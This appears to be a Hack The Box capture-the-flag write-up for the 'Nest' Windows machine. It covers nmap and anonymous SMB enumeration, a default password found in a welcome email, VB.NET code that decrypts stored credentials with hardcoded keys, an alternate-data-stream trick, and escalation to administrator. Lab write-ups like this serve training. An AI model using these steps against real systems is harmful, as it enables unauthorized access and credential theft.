Nest is a Windows machine considered easy/medium. An anonymous SMB access allows to retrieve a first non-privileged account. The recovery of an encrypted password and sources of a Visual Basic project allows lead the user’s password decryption. Privilege escalation is done through a “reporting” service allowing to get a new encrypted string on the disk. The decryption of this last one allows an administrator access.
Disclaimer : It is a rather quick presentation that deliberately omits the various research areas. Only the actual results and a quick approach are presented. Furthermore, I didn’t have lot of time to write and translate this write-up, so I used deepl.com translator for some parts ! I’m sorry if the english is not that good ! :)
Discovery / Enumeration
A quick port scan gives us running services on the machine
$ sudo nmap -sS -p 0-10000 -T4 -sV -sC default -O -v -oN scan_nmap 10.10.10.178
Nmap scan report for 10.10.10.178
Host is up (0.030s latency).
Not shown: 9999 filtered ports
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds?
4386/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, X11Probe:
| Reporting Service V1.2
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest, SIPOptions:
| Reporting Service V1.2
| Unrecognised command
| Help:
| Reporting Service V1.2
| This service allows users to run queries against databases using the legacy HQK format
| AVAILABLE COMMANDS ---
| LIST
| SETDIR <Directory_Name>
| RUNQUERY <Query_ID>
| DEBUG <Password>
|_ HELP <Command>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4386-TCP:V=7.70%I=7%D=2/23%Time=5E52D49C%P=x86_64-pc-linux-gnu%r(NU
SF:LL,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(GenericLin
SF:es,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognise
SF:d\x20command\r\n>")%r(GetRequest,3A,"\r\nHQK\x20Reporting\x20Service\x2
SF:0V1\.2\r\n\r\n>\r\nUnrecognised\x20command\r\n>")%r(HTTPOptions,3A,"\r\
SF:nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20comma
SF:nd\r\n>")%r(RTSPRequest,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\
SF:n\r\n>\r\nUnrecognised\x20command\r\n>")%r(RPCCheck,21,"\r\nHQK\x20Repo
SF:rting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSVersionBindReqTCP,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(DNSStatusRequestTCP,21,"
SF:\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Help,F2,"\r\nHQK\
SF:x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nThis\x20service\x20allows\
SF:x20users\x20to\x20run\x20queries\x20against\x20databases\x20using\x20th
SF:e\x20legacy\x20HQK\x20format\r\n\r\n---\x20AVAILABLE\x20COMMANDS\x20---
SF:\r\n\r\nLIST\r\nSETDIR\x20<Directory_Name>\r\nRUNQUERY\x20<Query_ID>\r\
SF:nDEBUG\x20<Password>\r\nHELP\x20<Command>\r\n>")%r(SSLSessionReq,21,"\r
SF:\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(TLSSessionReq,21,"\
SF:r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(Kerberos,21,"\r\nH
SF:QK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(SMBProgNeg,21,"\r\nHQK
SF:\x20Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(X11Probe,21,"\r\nHQK\x20
SF:Reporting\x20Service\x20V1\.2\r\n\r\n>")%r(FourOhFourRequest,3A,"\r\nHQ
SF:K\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\r\nUnrecognised\x20command\
SF:r\n>")%r(LPDString,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n
SF:>")%r(LDAPSearchReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\
SF:n>")%r(LDAPBindReq,21,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n
SF:>")%r(SIPOptions,3A,"\r\nHQK\x20Reporting\x20Service\x20V1\.2\r\n\r\n>\
SF:r\nUnrecognised\x20command\r\n>")%r(LANDesk-RC,21,"\r\nHQK\x20Reporting
SF:\x20Service\x20V1\.2\r\n\r\n>")%r(TerminalServer,21,"\r\nHQK\x20Reporti
SF:ng\x20Service\x20V1\.2\r\n\r\n>")%r(NCP,21,"\r\nHQK\x20Reporting\x20Ser
SF:vice\x20V1\.2\r\n\r\n>");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.473 days (since Sat Feb 22 09:20:24 2020)
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Host script results:
|_clock-skew: mean: 1m52s, deviation: 0s, median: 1m52s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-02-23 20:42:32
|_ start_date: 2020-02-22 09:23:12
NSE: Script Post-scanning.
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
Initiating NSE at 20:41
Completed NSE at 20:41, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1012.52 seconds
Raw packets sent: 30720 (1.357MB) | Rcvd: 663 (31.066KB)
The scan is revealing that 2 ports are open. The classical 445 but also the 4386 which seems to be a “Reporting” service.
Anonymous SMB access and temporary account
For the first research, we can start with a service we already know, SMB shares. Thanks to an anonymous connection, we are able to list the readable shares.
$ smbclient -U "" -L \\\\10.10.10.178
Unable to initialize messaging context
Enter WORKGROUP\'s password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
Secure$ Disk
Users Disk
SMB1 disabled -- no workgroup available
3 shares can be interesting for the moment:
- Data
- Secure$
- USers$
We start by looking at the Users$ share, which among other things allows us to retrieve the list of users on the machine. Useful!
$ smbclient -U "" \\\\10.10.10.178\\Users
Unable to initialize messaging context
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jan 26 00:04:21 2020
.. D 0 Sun Jan 26 00:04:21 2020
Administrator D 0 Fri Aug 9 17:08:23 2019
C.Smith D 0 Sun Jan 26 08:21:44 2020
L.Frost D 0 Thu Aug 8 19:03:01 2019
R.Thompson D 0 Thu Aug 8 19:02:50 2019
TempUser D 0 Thu Aug 8 00:55:56 2019
10485247 blocks of size 4096. 6545336 blocks available
Being curious, we can try the Secure$ share. But the name is true, this one is more secured, and we can’t log without a user account.
$ smbclient -U "" \\\\10.10.10.178\\Secure$
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \*
Last unexplored way, the Data share. We can see different things.
$ smbclient -U "" \\\\10.10.10.178\\Data
Unable to initialize messaging context
Enter WORKGROUP\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 8 00:53:46 2019
.. D 0 Thu Aug 8 00:53:46 2019
IT D 0 Thu Aug 8 00:58:07 2019
Production D 0 Mon Aug 5 23:53:38 2019
Reports D 0 Mon Aug 5 23:53:44 2019
Shared D 0 Wed Aug 7 21:07:51 2019
10485247 blocks of size 4096. 6545336 blocks available
After some research, we quickly come across a “Welcome Email” text file. This type of file can be very interesting because it can contain information such as default accounts.
smb: \Shared\Templates\HR\> ls
. D 0 Wed Aug 7 21:08:01 2019
.. D 0 Wed Aug 7 21:08:01 2019
Welcome Email.txt A 425 Thu Aug 8 00:55:36 2019
10485247 blocks of size 4096. 6545577 blocks available
smb: \Shared\Templates\HR\> get "Welcome Email.txt"
getting file \Shared\Templates\HR\Welcome Email.txt of size 425 as Welcome Email.txt (3.4 KiloBytes/sec) (average 1.9 KiloBytes/sec)
By getting this file, we manage to get the first real foothold, a user account !
$ cat Welcome\ Email.txt
We would like to extend a warm welcome to our newest member of staff, <FIRSTNAME> <SURNAME>
You will find your home folder in the following location:
\\HTB-NEST\Users\<USERNAME>
If you have any issues accessing specific services or workstations, please inform the
IT department and use the credentials below until all systems have been set up for you.
Username: TempUser
Password: welcome2019
Thank you
HR%
We then try to log in to the Secure$ share using our new account and boom, it is now in range for us.
$ smbclient -U "TempUser" \\\\10.10.10.178\\Secure$
Unable to initialize messaging context
Enter WORKGROUP\TempUser\'s password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Aug 8 01:08:12 2019
.. D 0 Thu Aug 8 01:08:12 2019
Finance D 0 Wed Aug 7 21:40:13 2019
HR D 0 Thu Aug 8 01:08:11 2019
IT D 0 Thu Aug 8 12:59:25 2019
Enumeration and gathering VB project
Here begins a new enumeration phase. Indeed, all the elements that were not previously accessible have to be analyzed, looking for new information.
This includes a portion of the previously inaccessible Data$ share.
$ smbclient -U "TempUser" \\\\10.10.10.178\\Data
Enter WORKGROUP\TempUser\'s password:
Try "help" to get a list of possible commands.
smb: \> cd IT
smb: \IT\> ls
. D 0 Thu Aug 8 00:58:07 2019
.. D 0 Thu Aug 8 00:58:07 2019
Archive D 0 Tue Aug 6 00:33:58 2019
Configs D 0 Thu Aug 8 00:59:34 2019
Installs D 0 Thu Aug 8 00:08:30 2019
Reports D 0 Sun Jan 26 01:09:13 2020
Tools D 0 Tue Aug 6 00:33:43 2019
10485247 blocks of size 4096. 6545577 blocks available
smb: \IT\> cd
Using the method we previsouly used for the welcome email, we quickly find an interesting file, located in one of the configuration folders, which seems to be used for a project called “RU Scanner”.
smb: \IT\Configs\Ru Scanner\> ls
. D 0 Wed Aug 7 22:01:13 2019
.. D 0 Wed Aug 7 22:01:13 2019
RU_config.xml A 270 Thu Aug 8 21:49:37 2019
10485247 blocks of size 4096. 6545577 blocks available
$ cat RU_config.xml
<?xml version="1.0"?>
<ConfigFile xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<Port>389</Port>
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
</ConfigFile>%
A user! The password here seems encrypted. Nevertheless, no doubt, we’re on the right track. New mission: find the project “RU Scanner”. Indeed, if it uses configuration files like this one, then it must be able to decipher the password.
I didn’t mention it at the beginning of the post, but this machine relies mainly on enumeration and information gathering. As always, not being able to move forward, we continue to investigate the resources that are available. A good idea may be to go and search the other resources in the “Configs” directory. Indeed, there is for example a configuration for the Notepad++ software.
smb: \IT\Configs\NotepadPlusPlus\> ls
. D 0 Wed Aug 7 21:31:37 2019
.. D 0 Wed Aug 7 21:31:37 2019
config.xml A 6451 Thu Aug 8 01:01:25 2019
shortcuts.xml A 2108 Wed Aug 7 21:30:27 2019
10485247 blocks of size 4096. 6545509 blocks available
This file reveals an absolute path toward the Carl user personnal files.
<History nbMaxFile="15" inSubMenu="no" customLength="-1">
<File filename="C:\windows\System32\drivers\etc\hosts" />
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
<File filename="C:\Users\C.Smith\Desktop\todo.txt" />
</History>
Even though we don’t have permission to list the contents of the IT directory, it turns out that it is possible to continue in the tree, if we have a valid path. This is exactly what we just found. This way, we can sneak into the user’s directory. :)
smb: \IT\Carl\> ls
. D 0 Wed Aug 7 21:42:14 2019
.. D 0 Wed Aug 7 21:42:14 2019
Docs D 0 Wed Aug 7 21:44:00 2019
Reports D 0 Tue Aug 6 15:45:40 2019
VB Projects D 0 Tue Aug 6 16:41:55 2019
10485247 blocks of size 4096. 6545509 blocks available
The VB Projects directory clearly shows the way. A few directories further on, we come across the famous RUScanner project!
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> ls
. D 0 Thu Aug 8 00:05:54 2019
.. D 0 Thu Aug 8 00:05:54 2019
bin D 0 Wed Aug 7 22:00:11 2019
ConfigFile.vb A 772 Thu Aug 8 00:05:09 2019
Module1.vb A 279 Thu Aug 8 00:05:44 2019
My Project D 0 Wed Aug 7 22:00:11 2019
obj D 0 Wed Aug 7 22:00:11 2019
RU Scanner.vbproj A 4828 Fri Aug 9 17:37:51 2019
RU Scanner.vbproj.user A 143 Tue Aug 6 14:55:27 2019
SsoIntegration.vb A 133 Thu Aug 8 00:05:58 2019
Utils.vb A 4888 Wed Aug 7 21:49:35 2019
10485247 blocks of size 4096. 6545509 blocks available
Small trick you can use in order to download an entire folder using smbclient.
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> mask ""
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> recurse ON
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> prompt OFF
smb: \IT\Carl\VB Projects\WIP\RU\RUScanner\> mget *
getting file \IT\Carl\VB Projects\WIP\RU\RUScanner\ConfigFile.vb of size 772 as ConfigFile.vb (1.8 KiloBytes/sec) (average 1.8 KiloBytes/sec)
...
Decryption and user shell
Having now the source code of the VB project, the goal is to identify the parts of the code allowing to perform the encryption/decryption of passwords. I won’t go into the details of the code, but a Decrypt function can be identified quite easily.
It takes several variables as parameters, including the encrypted password. If you don’t have the necessary environment to work with VB, you should know that there are several online services offering a simplified virtual environment.
This is notably the case of dotnetfiddle.com that I used for this machine. So we extract the decryption function, which we will call in a simple module, then we display the result.
Imports System
Imports System.Security.Cryptography
Imports System.Text
Public Module Module1
Public Sub Main()
Console.WriteLine("Hello World")
Dim password As String
password = Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
Console.WriteLine(password)
End Sub
Public Function Decrypt(ByVal cipherText As String, _
ByVal passPhrase As String, _
ByVal saltValue As String, _
ByVal passwordIterations As Integer, _
ByVal initVector As String, _
ByVal keySize As Integer) _
As String
Dim initVectorBytes As Byte()
initVectorBytes = Encoding.ASCII.GetBytes(initVector)
Dim saltValueBytes As Byte()
saltValueBytes = Encoding.ASCII.GetBytes(saltValue)
Dim cipherTextBytes As Byte()
cipherTextBytes = Convert.FromBase64String(cipherText)
Dim password As New Rfc2898DeriveBytes(passPhrase, _
saltValueBytes, _
passwordIterations)
Dim keyBytes As Byte()
keyBytes = password.GetBytes(CInt(keySize / 8))
Dim symmetricKey As New AesCryptoServiceProvider
symmetricKey.Mode = CipherMode.CBC
Dim decryptor As ICryptoTransform
decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)
Dim memoryStream As IO.MemoryStream
memoryStream = New IO.MemoryStream(cipherTextBytes)
Dim cryptoStream As CryptoStream
cryptoStream = New CryptoStream(memoryStream, _
decryptor, _
CryptoStreamMode.Read)
Dim plainTextBytes As Byte()
ReDim plainTextBytes(cipherTextBytes.Length)
Dim decryptedByteCount As Integer
decryptedByteCount = cryptoStream.Read(plainTextBytes, _
0, _
plainTextBytes.Length)
memoryStream.Close()
cryptoStream.Close()
Dim plainText As String
plainText = Encoding.ASCII.GetString(plainTextBytes, _
0, _
decryptedByteCount)
Return plainText
End Function
End Module
We quickly get the desired result, password !
Hello World
xRxRxPANCAK3SxRxRx
In particular, this allows us to get access to a new zone, as well as the user flag!
$ smbclient -U "c.smith" \\\\10.10.10.178\\Users
Enter WORKGROUP\c.smith\'s password:
Try "help" to get a list of possible commands.
smb: \> cd C.Smith\
smb: \C.Smith\> ls
. D 0 Sun Jan 26 08:21:44 2020
.. D 0 Sun Jan 26 08:21:44 2020
HQK Reporting D 0 Fri Aug 9 01:06:17 2019
user.txt A 32 Fri Aug 9 01:05:24 2019
10485247 blocks of size 4096. 6545509 blocks available
Getting the DEBUG password
New access = new enumeration phase.
The directory HQK Reporting draws our attention. Remember, similar information was reported during the nmap scan. So it makes sense that this is the reporting service.
smb: \C.smith\HQK Reporting\> ls
. D 0 Fri Aug 9 01:06:17 2019
.. D 0 Fri Aug 9 01:06:17 2019
AD Integration Module D 0 Fri Aug 9 14:18:42 2019
Debug Mode Password.txt A 0 Fri Aug 9 01:08:17 2019
HQK_Config_Backup.xml A 249 Fri Aug 9 01:09:05 2019
10485247 blocks of size 4096. 6544215 blocks available
During my first researches on the machine, I tried to connect to the service saw a debugging function, requiring a password. That’s fortunate, the above extract mentions a Debug Mode Password.txt file. Only problem, the file seems empty (size 0)…
This is where a file system trick comes in, streams! In simple words, a stream is a sequence of bytes containing information about a file. It can be keywords, owner information, etc. It is possible to create different streams.
With smbclient you can see this information with the following command.
smb: \C.smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time: Fri Aug 9 01:06:12 AM 2019 CEST
access_time: Fri Aug 9 01:06:12 AM 2019 CEST
write_time: Fri Aug 9 01:08:17 AM 2019 CEST
change_time: Fri Aug 9 01:08:17 AM 2019 CEST
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
Thus we observe an interesting element… The default stream ($DATA) is indeed empty, but a second stream, named “Password” has been created !
smbclient also offers the possibility to download a file by specifying the desired steams.
So…
smb: \C.smith\HQK Reporting\> get "Debug Mode Password.txt:Password:$Data"
getting file \C.smith\HQK Reporting\Debug Mode Password.txt:Password:$Data of size 15 as Debug Mode Password.txt:Password:$Data (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
$ cat Debug\ Mode\ Password.txt:Password:\$Data
WBQ201953D8w
Playing with the reporting service
The resolution of this machine continues on the second service identified during port scanning. This allows you to connect to the service through telnet.
$ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.
HQK Reporting Service V1.2
>help
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
Now that we have the DEBUG password, we can start this mode and get access to more commands.
>DEBUG WBQ201953D8w
Debug mode enabled. Use the HELP command to view additional commands that are now available
>HELP
This service allows users to run queries against databases using the legacy HQK format
--- AVAILABLE COMMANDS ---
LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>
The SERVICE command tells us the binary used here, while the SESSION command tells us the current directory.
>SERVICE
--- HQK REPORTING SERVER INFO ---
Version: 1.2.0.0
Server Hostname: HTB-NEST
Server Process: "C:\Program Files\HQK\HqkSvc.exe"
Server Running As: Service_HQK
Initial Query Directory: C:\Program Files\HQK\ALL QUERIES
>SESSION
--- Session Information ---
Session ID: 32315e55-e64a-4b71-bf3f-124285e93ede
Debug: True
Started At: 3/29/2020 11:55:33 AM
Server Endpoint: 10.10.10.178:4386
Client Endpoint: 10.10.14.4:34380
Current Query Directory: C:\Program Files\HQK\ALL QUERIES
Afterwards, the SETDIR, LIST and SHOWQUERY commands are used. In fact, we can use them as a system to browse the machine filesystem. Indeed, it is possible to associate these commands with the classic cd, ls and cat commands.
>SETDIR ../
Current directory set to HQK
>LIST
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml
Current Directory: HQK
The LDAP and Logs directories catch our attention. The LDAP directory is where we find what we are looking for.
>SETDIR LDAP
Current directory set to LDAP
>LIST
Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command
QUERY FILES IN CURRENT DIRECTORY
[1] HqkLdap.exe
[2] Ldap.conf
Current Directory: LDAP
The Ldap.conf file reveals the desired information such as the encrypted password for the administrator!
>SHOWQUERY 2
Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=
Decryption vol.2 and privilege escalation
Okay, we now have an encrypted password for the privileged account! This part seems to be directly used by the process to perform the administrator authentication. So that means we’re going to have to interact directly with this process.
We start by retrieving it locally.
Once this is done, we can decompile the binary. I used dnSpy for this. I also skip the analysis here, but we quickly find the decryption function. This one is identical to the one previously identified for the user part.
At this point, there are two options to decrypt the password :
- Modify the binary code, to display the decrypted password, then recompile and execute it;
- Use our online environment again by changing the function settings.
Not being very good with dnSpy and being a bit fed up of this machine, I took the easy way out by reusing the same thing as for the user :).
[...]
Public Sub Main()
Console.WriteLine("Hello World")
Dim password As String
password = Decrypt(EncryptedString, "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256, 256)
Console.WriteLine(password)
End Sub
[...]
And so: XtH4nkS4Pl4y1nGX
Tadaaaam! We can connect and get the root flag.
For your information, I first went to the Users share and this is what I found.
$ smbclient -U "Administrator" \\\\10.10.10.178\\Users
Unable to initialize messaging context
Enter WORKGROUP\Administrator\'s password:
Try "help" to get a list of possible commands.
smb: \> cd Administrator\
smb: \Administrator\> ls
. D 0 Fri Aug 9 17:08:23 2019
.. D 0 Fri Aug 9 17:08:23 2019
flag.txt - Shortcut.lnk A 2384 Fri Aug 9 17:10:15 2019
10485247 blocks of size 4096. 6544908 blocks available
No root flag… But a “flag.txt” file (impossible to retrieve for me).
After a few seconds, I thought about the fact that the Users share was a copy/reproduction of the C:/Users directory of the machine, and that having administrator rights, we could simply connect to it.
$ smbclient -U "Administrator" \\\\10.10.10.178\\C$
Enter WORKGROUP\Administrator\'s password:
Try "help" to get a list of possible commands.
smb: \Users\Administrator\Desktop\> ls
. DR 0 Sun Jan 26 08:20:50 2020
.. DR 0 Sun Jan 26 08:20:50 2020
desktop.ini AHS 282 Sat Jan 25 23:02:44 2020
root.txt A 32 Tue Aug 6 00:27:26 2019
10485247 blocks of size 4096. 6543963 blocks available
w00ted !